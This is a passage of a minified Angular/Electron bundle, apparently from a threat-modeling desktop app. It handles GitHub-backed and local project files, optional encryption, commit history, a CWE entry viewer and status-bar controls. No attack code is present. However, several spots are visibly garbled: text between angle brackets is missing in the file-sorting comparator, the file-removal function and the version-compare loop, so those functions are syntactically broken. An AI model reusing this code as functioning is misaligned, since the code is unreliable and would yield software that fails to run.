Ne={msg:""};(this.SelectedFile.source==hn.Import||e)&&(Ne.newProject={name:"",source:hn.GitHub,type:this.SelectedFile.type,configFile:null,path:"",repoId:this.SelectedFile.repoId,isEncrypted:te,sha:null}),te&&(Ne.removePW=!1),this.dialog.open(GG,{hasBackdrop:!1,data:Ne}).afterClosed().subscribe(ut=>{ut?(null!=Ne.newProject&&(this.selectedFile=Ne.newProject,this.Project.Name=this.selectedFile.name),Y(yt=>{this.selectedFile.sha=yt.content.sha;const It=this.locStorage.Get(si.LAST_FILE),St=JSON.parse(It);this.compareFiles(this.SelectedFile,St)&&this.locStorage.Set(si.LAST_FILE,JSON.stringify(this.SelectedFile)),Fe(this.SelectedFile)},this.GetRepoOfFile(this.SelectedFile).owner,this.GetRepoOfFile(this.SelectedFile).name,this.SelectedFile.path,Ne.msg,this.SelectedFile.sha,pe.ToJSON(),(null!=Ne.pw||te)&&!Ne.removePW,Ne.pw)):r()})}else if(this.SelectedFile.source==hn.FileSystem){0==this.electron.ipcRenderer.listenerCount("SaveFileCallback")&&this.electron.ipcRenderer.on("SaveFileCallback",(et,ut)=>{this.zone.run(()=>{ut?(e&&(this.selectedFile={source:hn.FileSystem,type:this.SelectedFile.type,path:ut,name:this.GetFileName(ut),isEncrypted:this.SelectedFile.isEncrypted},this.Project.Name=this.GetFileName(ut)),Fe(this.SelectedFile)):c()}),this.electron.ipcRenderer.removeAllListeners("SaveFileCallback"),this.isLoading.remove()}),this.isLoading.add();const Ne=this.getFileContent(pe.ToJSON(),te);this.electron.ipcRenderer.send(e?"SaveFileAs":"SaveFile",this.SelectedFile.path,Ne)}}}})})}OnCloseApp(e){var i,n;if((null===(i=this.Project)||void 0===i?void 0:i.FileChanged)||(null===(n=this.Config)||void 0===n?void 0:n.FileChanged))return this.zone.run(()=>{this.OnCloseFile().then(()=>{this.electron.isElectron&&this.electron.ipcRenderer.send("OnCloseApp")})}),e.returnValue=!1,!1}DeleteFile(e){if(this.isLoading.add(),e.source==hn.GitHub)new Rl({auth:this.accessToken}).rest.repos.deleteFile({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path,message:"Delete file "+e.name,sha:e.sha,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({})=>{this.messagesService.Success("messages.success.githubdelete",e.name),e==this.SelectedFile&&(this.selectedFile=null,this.Project=null,this.Config=Wu.DefaultFile()),this.removeFileFromAvailableFiles(e)}).catch(n=>{this.messagesService.Error("messages.error.githubdelete",n),console.error(n)}).finally(()=>this.isLoading.remove());else if(e.source==hn.FileSystem){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+name,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{r&&(this.removeFileFromAvailableFiles(e),this.electron.isElectron&&this.electron.ipcRenderer.send("DeleteFile",e.path)),this.isLoading.remove()})}}RemoveFSFile(e){this.removeFileFromAvailableFiles(e)}ExchangeConfig(e){this.exchangeConfigDialog().subscribe(i=>{i&&new Rl({auth:this.accessToken}).repos.getContent({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path}).then(({data:r})=>{let c=JSON.parse(O5.from(r.content,"base64").toString()),d=JSON.parse(c.content);this.fileUpdate.UpdateConfigFile(d);let T=this.Project.ToJSON();T.config=d,this.Project=mf.FromJSON(T),this.messagesService.Info("messages.info.exchangeConfig")}).catch(r=>{this.closeFile(),this.messagesService.Error("messages.error.githubfetch",r)}).finally(()=>{this.isLoading.remove()})})}ExchangeConfigWithDefault(){this.exchangeConfigDialog().subscribe(e=>{if(e){let i=Wu.DefaultFile().ToJSON();this.fileUpdate.UpdateConfigFile(i);let n=this.Project.ToJSON();n.config=i,this.Project=mf.FromJSON(n),this.messagesService.Info("messages.info.exchangeConfig")}})}OnTransferProjectDetails(){this.dialog.open(gOe)}GetGHProjectHistory(){return new Promise((e,i)=>{let n=[];if(this.SelectedFile){const r=this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new Rl,c=this.SelectedFile;r.repos.listCommits({owner:this.GetRepoOfFile(c).owner,repo:this.GetRepoOfFile(c).name,path:c.path}).then(({data:d})=>{d.forEach(T=>{n.push({commiter:T.commit.committer.name,message:T.commit.message,date:T.commit.committer.date,sha:T.sha})}),e(n)}).catch(()=>i())}else e(n)})}OnCloseFile(){return new Promise((e,i)=>{var n,r,c;if((null===(n=this.Project)||void 0===n?void 0:n.FileChanged)||(null===(r=this.Config)||void 0===r?void 0:r.FileChanged)){let d={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant(null!==(c=this.Project)&&void 0!==c&&c.FileChanged?"dialog.unsaved.saveProject":"dialog.unsaved.saveConfig"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};this.dialog.open(_M,{hasBackdrop:!1,data:d}).afterClosed().subscribe(k=>{k?this.OnSave().then(()=>{this.closeFile(),e()}).catch(()=>i()):(this.closeFile(),e())})}else this.closeFile(),e()})}ConsistencyCheck(){return new Promise(e=>{if(this.Project){const i=this.Project.ConsistencyCheck(this.translate);if(i.length>0){let n=this.translate.instant("dialog.consistencycheck.desc")+":\n\n";n+=i.join("\n");let r={title:this.translate.instant("dialog.consistencycheck.title"),textContent:n,resultTrueText:this.translate.instant("general.OK"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!1,data:r}).afterClosed().subscribe(d=>e(!1))}else e(!0)}else e(!0)})}ManualConsistencyCheck(){this.ConsistencyCheck().then(e=>{e&&this.messagesService.Success("messages.success.ConsistencyCheck")})}SetPassword(e){this.SelectedFile&&(this.SelectedFile.isEncrypted=!0,this.fileContentCrypto=new y5(e))}RemovePassword(){this.SelectedFile&&(this.SelectedFile.isEncrypted=!1)}OpenRepo(e){window.open(this.GetRepoOfFile(e).url,"_blank")}GetRepoOfFile(e){return this.Repos.find(i=>i.id==e.repoId)}GetFileName(e){return e.substring(e.lastIndexOf("/")+1)}GetFilePath(e){return e.substring(0,e.lastIndexOf("/"))}Debug(){console.log(this.Project),console.log(this.Config);let e=[],i=[];this.Config.GetAttackVectors().forEach(r=>{var c,d;r.OriginTypes.includes(Nm.Weakness)&&(null===(c=r.Weakness)||void 0===c?void 0:c.CWEID)&&e.push(r.Weakness.CWEID),r.OriginTypes.includes(Nm.AttackTechnique)&&(null===(d=r.AttackTechnique)||void 0===d?void 0:d.CAPECID)&&i.push(r.AttackTechnique.CAPECID)}),e.sort((r,c)=>r-c),i.sort((r,c)=>r-c);let n=["Supported CWEs:",e,"Supported CAPECs:",i,"Threat Categories: ",this.Config.GetThreatCategories().length.toString()];n.push("Threats: ",this.Config.GetAttackVectors().length.toString(),"Threat Rules: ",this.Config.GetThreatRules().length.toString()),this.Config.GetThreatQuestions().length.toString(),console.log(n)}Debug2(){if(!this.Project)return;let e=this.Project.ToJSON();delete e.config;let i=JSON.stringify(e,null,2);const n=this.clipboard.beginCopy(i);let r=3;const c=()=>{!n.copy()&&--r?setTimeout(c):n.destroy()};return c(),i}Debug3(){let e=JSON.stringify(this.Config.ToJSON(),null,2);const i=this.clipboard.beginCopy(e);let n=3;const r=()=>{!i.copy()&&--n?setTimeout(r):i.destroy()};return r(),e}checkAppVersionUpdate(){const e=this.locStorage.Get(si.CURRENT_VERSION);if(e&&uf_i!=e){if(this.isNewVersion(uf_i,"0.4.18")&&!this.isNewVersion(e,"0.4.18")){this.locStorage.Remove(si.LAST_FILE);const i=this.locStorage.Get(si.FILE_HISTORY);if(i){const n=JSON.parse(i),r=[];n.forEach(c=>{const d=c.split(":"),T="FS"==d[0]?hn.FileSystem:hn.GitHub,k={path:d[1],name:this.GetFileName(d[1]),source:T,type:Es.Project,isEncrypted:null};T==hn.GitHub&&(k.repoId=Number(d[0])),r.push(k)}),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(r))}}setTimeout(()=>{this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.versionUpdate"),uf_i))},5e3)}this.locStorage.Set(si.CURRENT_VERSION,uf_i)}getFileContent(e,i,n=null){this.isLoading.add(),this.SelectedFile&&(this.SelectedFile.isEncrypted=i);const r={content:JSON.stringify(e)};if(i){n&&(this.fileContentCrypto=new y5(n));let d=JSON.parse(JSON.stringify(r));r.content=this.fileContentCrypto.Encrypt(JSON.stringify(d.content)),r.encrypted=this.fileContentCrypto.Encrypt(this.fileContentCrypto.GetRandom(16).toString("base64"))}const c=JSON.stringify(r);return this.isLoading.remove(),c}exchangeConfigDialog(){let e={title:this.translate.instant("dialog.configexchange.title"),textContent:this.translate.instant("dialog.configexchange.desc"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.dialog.open(_M,{hasBackdrop:!1,data:e}).afterClosed()}closeFile(){this.Project=null,this.Config=null,this.selectedFile=null,this.locStorage.Remove(si.LAST_FILE),this.Config=Wu.DefaultFile(),this.Config.FileChanged=!1,this.router.navigate(["/"])}addFileToAvailableFiles(e){if(e){this.AvailableFiles.some(n=>this.compareFiles(n,e))||this.availableFiles.splice(0,0,e);const i=this.getLastFileHistory();this.availableFiles=this.availableFiles.sort((n,r)=>{if(n.source==hn.GitHub&&!this.GetRepoOfFile(n).isWritable)return 1;if(r.source==hn.GitHub&&!this.GetRepoOfFile(r).isWritable)return-1;let c=i.findIndex(T=>this.compareFiles(T,n)),d=i.findIndex(T=>this.compareFiles(T,r));return c>=0||d>=0?(-1==c&&(c=Number.MAX_VALUE),-1==d&&(d=Number.MAX_VALUE),cthis.compareFiles(n,e));i>=0&&this.availableFiles.splice(i,1)}addFileToHistory(e){if(e&&(this.KeepUserSignedIn||e.source==hn.FileSystem)){const i=this.getLastFileHistory(),n=i.findIndex(r=>this.compareFiles(r,e));n>=0&&i.splice(n,1),i.splice(0,0,e),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i)),this.locStorage.Set(si.LAST_FILE,JSON.stringify(e)),this.addFileToAvailableFiles(e)}}removeFileFromHistory(e){if(e&&e.path){const i=this.getLastFileHistory(),n=i.findIndex(c=>this.compareFiles(c,e));n>=0&&i.splice(n,1),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i));const r=JSON.parse(this.locStorage.Get(si.LAST_FILE));r&&this.SelectedFile&&r.source==hn.GitHub&&this.compareFiles(r,this.SelectedFile)&&this.locStorage.Remove(si.LAST_FILE)}}getLastFileHistory(){const e=this.locStorage.Get(si.FILE_HISTORY);return e?JSON.parse(e):[]}clearLoginData(){this.locStorage.Remove(si.AUTH_ACCESS_TOKEN),this.locStorage.Remove(si.AUTH_LAST_CODE),this.locStorage.Remove(si.GH_ACCOUNT_NAME),this.locStorage.Remove(si.GH_USER_NAME),this.locStorage.Remove(si.GH_USER_URL),this.userMode=Wr.None,this.userAccount=this.userName=this.accessToken=this.userURL=""}retrieveUser(){if(this.accessToken&&this.accessToken.length>0){this.isLoading.add();const e=new Rl({auth:this.accessToken});e.request("GET /user").then(({data:i})=>{const n=()=>{this.KeepUserSignedIn&&(this.locStorage.Set(si.GH_ACCOUNT_NAME,this.userAccount),this.locStorage.Set(si.GH_USER_NAME,this.userName),this.locStorage.Set(si.GH_USER_URL,this.userURL),this.locStorage.Set(si.GH_USER_EMAIL,this.userEmail)),this.retrieveRepositories(),this.router.navigate(["/home"])};this.userAccount=i.login,this.userName=i.name,this.userURL=i.html_url,this.userEmail=i.email,this.UserEmail?n():e.users.listEmailsForAuthenticatedUser().then(({data:r})=>{this.userEmail=r.find(c=>c.primary).email,n()}).catch(r=>this.messagesService.Error("messages.error.githubfetch",r)).finally(()=>this.isLoading.remove())}).catch(i=>{this.messagesService.Error("messages.error.githubfetch",i)}).finally(()=>this.isLoading.remove())}}retrieveRepositories(){this.repos=[];const e=(n,r,c,d,T)=>{this.addFileToAvailableFiles({repoId:r,name:c,path:d,sha:T,isEncrypted:!1,source:hn.GitHub,type:n});const q=this.locStorage.Get(si.LAST_FILE);if(!this.blockLoading&&this.KeepUserSignedIn&&q){const Y=JSON.parse(q),te=this.AvailableFiles.find(pe=>pe.source==hn.GitHub&&this.compareFiles(pe,Y));te&&(this.blockLoading=!0,this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),te.name)),this.OnLoadFile(te),setTimeout(()=>{this.blockLoading=!1},5e3))}};this.getExampleRepository().finally(()=>{const n=r=>{this.repos.forEach(c=>{this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:""}).then(({data:d})=>{d.some(T=>"projects"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"projects"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmp")).forEach(k=>{e(Es.Project,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()})),d.some(T=>"configs"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"configs"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmc")).forEach(k=>{e(Es.Config,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()}))}).finally(()=>{this.isLoading.remove()})})};if(this.UserMode==Wr.LoggedIn){const r=new Rl({auth:this.accessToken});this.isLoading.add(),r.repos.listForAuthenticatedUser().then(({data:c})=>{c.forEach(d=>{let T={id:d.id,name:d.name,owner:d.owner.login,url:d.html_url,updated:new Date(d.updated_at),private:d.private,isWritable:!0};this.repos.push(T)}),n(r)}).finally(()=>{this.isLoading.remove()})}else n(new Rl)})}getExampleRepository(){this.isLoading.add();const e=new Rl,i="SecSimon",n="TTM-examples",r=e.repos.get({owner:i,repo:n});return r.then(c=>{let T={id:c.data.id,name:n,owner:i,url:c.data.html_url,updated:new Date(c.data.updated_at),private:c.data.private,isWritable:!1};this.repos.push(T)}).catch(c=>{this.messagesService.Error(c.message)}).finally(()=>{this.isLoading.remove()}),r}restoreUserAccount(){this.accessToken=this.locStorage.Get(si.AUTH_ACCESS_TOKEN),Gi.NullOrEmpty(this.accessToken)||(this.userMode=Wr.LoggedIn),this.userName=this.locStorage.Get(si.GH_USER_NAME),this.userAccount=this.locStorage.Get(si.GH_ACCOUNT_NAME),this.userURL=this.locStorage.Get(si.GH_USER_URL),this.userEmail=this.locStorage.Get(si.GH_USER_EMAIL),this.UserMode==Wr.LoggedIn&&setTimeout(()=>{this.messagesService.Success("messages.success.welcomeBack",Gi.EmptyIfNull(this.UserDisplayName))},500)}compareFiles(e,i){return e.source==i.source&&e.name==i.name&&e.path==i.path&&e.repoId==i.repoId}isNewVersion(e,i){const n=i.replace("v","").split("."),r=e.replace("v","").split(".");if(n.length==r.length)for(let c=0;cNumber(n[c]))return!0;if(Number(r[c]){this.unsavedChangesMinutes++,this.unsavedChangesMinutes%5==0&&this.messagesService.ShowUnsavedChanges&&(this.messagesService.UnsavedChanges(Gi.Format(this.translate.instant("messages.warning.unsavedChanges"),this.unsavedChangesMinutes.toString())),this.ConsistencyCheck())},6e4))}stopUnsavedChangesTimer(){this.unsavedChangesTimer&&(clearInterval(this.unsavedChangesTimer),this.unsavedChangesTimer=null)}}return t.\u0275fac=function(e){return new(e||t)(At(_r),At(QG),At(op),At(Oo),At(hz),At(vu),At(A2),At(Sn),At(D5),At(qi),At(ST))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function yOe(t,a){if(1&t&&(m(0,"mat-form-field",6),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"textarea",7),s(7,"\n "),u()),2&t){const e=V(2);g(3),ke(re(4,3,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("ExtendedDescription"))}}function bOe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"tr"),s(3,"\n "),m(4,"td",12),s(5),u(),s(6,"\n "),m(7,"td"),s(8,"Technical Impact: "),m(9,"em"),s(10),u()(),s(11,"\n "),u(),s(12,"\n "),m(13,"tr")(14,"td"),s(15),u()(),s(16,"\n "),Mt()),2&t){const e=a.$implicit,i=V(3);g(5),ke(i.GetValues(e.Scope,!1)),g(5),ke(i.GetValues(e.Impact,!0)),g(5),ke(i.GetValues(e.Note,!1))}}function MOe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"table"),s(3,"\n "),m(4,"tr",10)(5,"th"),s(6,"Scope"),u(),m(7,"th"),s(8,"Impact"),u()(),s(9,"\n "),ne(10,bOe,17,3,"ng-container",11),s(11,"\n "),u(),s(12,"\n "),Mt()),2&t){const e=V(2);g(10),F("ngForOf",e.GetCWEConsequences())}}function vOe(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n "),m(2,"mat-form-field",2),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),it(8,"input",3),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-form-field",4),s(12,"\n "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n "),it(17,"input",3),s(18,"\n "),u(),s(19,"\n "),m(20,"button",5),he("click",function(){return be(e),Me(V().OpenCWE())}),oe(21,"translate"),s(22,"\n "),m(23,"mat-icon"),s(24,"open_in_new"),u(),s(25,"\n "),u(),s(26,"\n "),m(27,"mat-form-field",6),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),it(33,"textarea",7),s(34,"\n "),u(),s(35,"\n "),ne(36,yOe,8,5,"mat-form-field",8),s(37,"\n "),ne(38,MOe,13,1,"ng-container",9),s(39,"\n"),u()}if(2&t){const e=V();g(5),ke(re(6,12,"properties.CWETitle")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWETitle()),g(6),ke(re(15,14,"properties.likelihoodOfExploit")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Likelihood_Of_Exploit")),g(3),at("matTooltip",re(21,16,"general.openInNew")),g(10),ke(re(31,18,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Description")),g(3),F("ngIf",e.GetCWEProperty("ExtendedDescription")),g(2),F("ngIf",e.GetCWEConsequences()&&e.GetCWEConsequences().length>0)}}let N5=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.cweID||console.error("Unset cweID")}OpenCWE(){window.open(t.GetURL(this.cweID),"_blank")}GetCWETitle(){return this.GetCWEEntry()?"CWE-"+Op[this.cweID].attr["@_ID"]+": "+Op[this.cweID].attr["@_Name"]+" ("+Op[this.cweID].attr["@_Status"]+")":null}GetCWEProperty(e){return this.GetCWEEntry()?this.GetCWEEntry()[e]?this.GetCWEEntry()[e]:"":null}GetCWEEntry(){return Op[this.cweID]}GetCWEConsequences(){return this.GetCWEEntry()&&Op[this.cweID].Common_Consequences?Array.isArray(Op[this.cweID].Common_Consequences.Consequence)?Op[this.cweID].Common_Consequences.Consequence:[Op[this.cweID].Common_Consequences.Consequence]:null}GetValues(e,i){return Array.isArray(e)?e.join(i?"; ":"\n"):e}static GetURL(e){return"https://cwe.mitre.org/data/definitions/"+e.toString()+".html"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-cwe-entry"]],inputs:{cweID:"cweID"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","calc(100% - 250px)","margin-right","5px"],["matInput","","type","text",3,"spellcheck","value"],["appearance","fill",2,"width","200px","margin-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"spellcheck","value"],["appearance","fill","style","width: 100%;",4,"ngIf"],[4,"ngIf"],[2,"text-align","left"],[4,"ngFor","ngForOf"],["rowSpan","2",2,"vertical-align","top"]],template:function(e,i){1&e&&ne(0,vOe,40,20,"div",0),2&e&&F("ngIf",i.cweID)},dependencies:[Zi,Ri,oa,da,nn,un,Go,Xa,Pa,Xi]}),t})(),ff=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:dm,deps:[yT],useFactory:a=>a.Locale},{provide:q1,useClass:YRe},{provide:zq,useValue:ixe}],imports:[rn,Ms,iw,z4,ux,iH,Gq,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,up,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Od,WV,VV,ZV,tB,iB,bu,iw,z4,ux,iH,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,up,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Od,WV,VV,ZV,tB,iB,bu]}),t})();Ds(w5,[Zi,Ri,an,Ta,Ea,oa,da,nn,un,jr,qh,V1,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,Pa,Mg,il,Ec,Dc,tl,wl,gp,zG,R5,UG],[Xi,E5]),Ds(BG,[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,xl,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,x8,I5],[Xi,T5]),Ds(I5,[Zi,Ri,an,Ac,Ta,Ea,oa,da,nn,un,Go,Xa,Pa,il,Ec,Dc,tl,wl,N5],[Xi,T5]),Ds(R5,[nn,Xa,jp],[Xi]);var F$={prefix:"fas",iconName:"left-right",icon:[512,512,[8596,"arrows-alt-h"],"f337","M504.3 273.6c4.9-4.5 7.7-10.9 7.7-17.6s-2.8-13-7.7-17.6l-112-104c-7-6.5-17.2-8.2-25.9-4.4s-14.4 12.5-14.4 22l0 56-192 0 0-56c0-9.5-5.7-18.2-14.4-22s-18.9-2.1-25.9 4.4l-112 104C2.8 243 0 249.3 0 256s2.8 13 7.7 17.6l112 104c7 6.5 17.2 8.2 25.9 4.4s14.4-12.5 14.4-22l0-56 192 0 0 56c0 9.5 5.7 18.2 14.4 22s18.9 2.1 25.9-4.4l112-104z"]},Z5={prefix:"fas",iconName:"code-branch",icon:[448,512,[],"f126","M80 104c13.3 0 24-10.7 24-24s-10.7-24-24-24S56 66.7 56 80s10.7 24 24 24zm80-24c0 32.8-19.7 61-48 73.3v87.8c18.8-10.9 40.7-17.1 64-17.1h96c35.3 0 64-28.7 64-64v-6.7C307.7 141 288 112.8 288 80c0-44.2 35.8-80 80-80s80 35.8 80 80c0 32.8-19.7 61-48 73.3V160c0 70.7-57.3 128-128 128H176c-35.3 0-64 28.7-64 64v6.7c28.3 12.3 48 40.5 48 73.3c0 44.2-35.8 80-80 80s-80-35.8-80-80c0-32.8 19.7-61 48-73.3V352 153.3C19.7 141 0 112.8 0 80C0 35.8 35.8 0 80 0s80 35.8 80 80zm232 0c0-13.3-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24s24-10.7 24-24zM80 456c13.3 0 24-10.7 24-24s-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24z"]},KX={prefix:"fas",iconName:"right-long",icon:[512,512,["long-arrow-alt-right"],"f30b","M334.5 414c8.8 3.8 19 2 26-4.6l144-136c4.8-4.5 7.5-10.8 7.5-17.4s-2.7-12.9-7.5-17.4l-144-136c-7-6.6-17.2-8.4-26-4.6s-14.5 12.5-14.5 22l0 88L32 208c-17.7 0-32 14.3-32 32l0 32c0 17.7 14.3 32 32 32l288 0 0 88c0 9.6 5.7 18.2 14.5 22z"]};function jst(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"check_circle"),u(),s(3),Mt()),2&t){const e=V();g(3),ke(e.messagesService.SuccessMsgs.length)}}function Qst(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"info"),u(),s(3),Mt()),2&t){const e=V();g(3),ke(e.messagesService.InfoMsgs.length)}}function $st(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",2),s(4,"lock"),u(),s(5," \n "),u()}2&t&&at("matTooltip",re(1,1,"status-bar.passwordProtectionOn"))}function Kst(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(V(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",2),s(4,"lock_open_right"),u(),s(5," \n "),u()}if(2&t){const e=V(2);at("matTooltip",re(1,2,"status-bar.passwordProtectionOff")),F("disabled",!e.dataService.SelectedFile)}}function Xst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).dataService.OnSave(!1,!0))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadProject"))}function Yst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V(2).dataService.OnSave(!1,!0,!0))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadConfig"))}function Jst(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",9),he("click",function(){return be(e),Me(V().dialogService.OpenModelInfoDialog())}),s(3,"\n "),m(4,"mat-icon",2),s(5,"source"),u(),s(6,"\n "),u(),s(7,"\n "),m(8,"button",10),he("click",function(){return be(e),Me(V().dialogService.OpenModelChangesDialog())}),s(9,"\n "),m(10,"span"),s(11),u(),s(12,"\n "),u(),s(13,"\n "),ne(14,$st,6,3,"button",11),s(15,"\n "),ne(16,Kst,6,4,"button",12),s(17,"\n "),m(18,"button",13),he("click",function(){return be(e),Me(V().dialogService.OpenModelTasksNotesDialog())}),oe(19,"translate"),s(20,"\n "),m(21,"mat-icon",2),s(22,"edit_note"),u(),s(23," \n "),u(),s(24,"\n "),m(25,"button",14),he("click",function(){return be(e),Me(V().dataService.ManualConsistencyCheck())}),oe(26,"translate"),s(27,"\n "),m(28,"mat-icon",2),s(29,"flaky"),u(),s(30," \n "),u(),s(31,"\n "),m(32,"button",15),he("click",function(){return be(e),Me(V().dataService.OnSave())}),oe(33,"translate"),s(34,"\n "),m(35,"mat-icon",2),s(36,"save"),u(),s(37," \n "),u(),s(38,"\n "),m(39,"button",14),he("click",function(){return be(e),Me(V().dataService.OnSave(!0))}),oe(40,"translate"),s(41,"\n "),m(42,"mat-icon",2),s(43,"save_as"),u(),s(44," \n "),u(),s(45,"\n "),ne(46,Xst,6,3,"button",11),s(47,"\n "),ne(48,Yst,6,3,"button",11),s(49,"\n "),m(50,"button",14),he("click",function(){return be(e),Me(V().dataService.ReloadFile())}),oe(51,"translate"),s(52,"\n "),m(53,"mat-icon",2),s(54,"refresh"),u(),s(55," \n "),u(),s(56,"\n "),Mt()}if(2&t){const e=V();g(10),ri("color",null!=e.dataService.Project&&e.dataService.Project.FileChanged||null!=e.dataService.Config&&e.dataService.Config.FileChanged?"yellow":"white"),g(1),ke(e.dataService.HasProject?null==e.dataService.Project?null:e.dataService.Project.Name:null==e.dataService.Config?null:e.dataService.Config.Name),g(3),F("ngIf",null==e.dataService.SelectedFile?null:e.dataService.SelectedFile.isEncrypted),g(2),F("ngIf",!(null!=e.dataService.SelectedFile&&e.dataService.SelectedFile.isEncrypted)),g(2),at("matTooltip",re(19,14,"status-bar.TasksAndNotes")),F("disabled",!e.dataService.HasProject),g(7),at("matTooltip",re(26,16,"status-bar.ConsistencyCheck")),g(7),at("matTooltip",re(33,18,"general.Save")),F("disabled",!e.dataService.CanSaveFile),g(7),at("matTooltip",re(40,20,"general.SaveAs")),g(7),F("ngIf",e.dataService.HasProject),g(2),F("ngIf",!e.dataService.HasProject),g(2),at("matTooltip",e.dataService.HasProject?"general.ReloadProject":re(51,22,"general.ReloadConfig"))}}function Zst(t,a){if(1&t&&(m(0,"span"),s(1),u()),2&t){const e=V();g(1),ke(e.GetProgress())}}function ect(t,a){1&t&&(m(0,"span"),s(1,"-"),u())}function tct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",17),he("click",function(){return be(e),Me(V().dataService.Debug3())}),s(3,"\n "),m(4,"mat-icon",2),s(5,"bug_report"),u(),s(6,"\n "),u(),s(7,"\n "),m(8,"button",18),he("click",function(){return be(e),Me(V().dataService.Debug2())}),s(9,"\n "),m(10,"mat-icon",2),s(11,"bug_report"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",18),he("click",function(){return be(e),Me(V().dataService.Debug())}),s(15,"\n "),m(16,"mat-icon",2),s(17,"bug_report"),u(),s(18,"\n "),u(),s(19,"\n "),Mt()}}let pf=(()=>{class t{constructor(e,i,n,r,c){this.messagesService=e,this.dataService=i,this.dialogService=n,this.locStorage=r,this.translate=c,this.faCodeBranch=Z5,this.showDebug=!1}ngOnInit(){this.version=uf_i}GetProgress(){if(this.dataService.Project){let 